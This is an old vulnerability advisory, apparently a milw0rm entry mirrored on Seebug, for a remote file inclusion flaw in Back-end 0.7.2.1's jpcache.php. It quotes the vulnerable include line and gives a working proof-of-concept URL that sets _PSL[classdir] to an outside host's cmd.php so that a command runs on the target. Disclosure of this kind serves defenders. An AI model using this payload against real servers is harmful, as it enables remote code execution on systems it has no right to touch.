# Federico Fazzi, <federico@autistici.org> # Back-end = 0.7.2.1 (jpcache.php) Remote command execution # 08/06/2006 1:04 # Bug: # # jpcache.php: line 40 # # --- # $includedir = $_PSL['classdir'] . "/jpcache"; # --- # # Proof of concept: # # Back-end have a default path pre-set on jpcache.php, # and cracker can execute a remote command. # # http://example/[be_path]/class/jpcache/jpcache.php?_PSL[classdir]=http://example/cmd.php?exec=uname # milw0rm.com [2006-06-08]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论